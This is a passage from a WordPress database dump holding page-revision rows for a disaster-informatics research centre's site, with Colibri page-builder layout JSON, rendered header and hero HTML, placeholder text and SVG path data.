<!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 15:41:15','2022-02-16 15:41:15','',20,'https://gsudice.dataconn.net/?p=295',0,'revision','',0),(296,1,'2022-02-16 15:41:15','2022-02-16 15:41:15','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 15:41:15','2022-02-16 15:41:15','',23,'https://gsudice.dataconn.net/?p=296',0,'revision','',0),(297,1,'2022-02-16 15:41:15','2022-02-16 15:41:15','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-start align-items-md-start align-items-start style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path 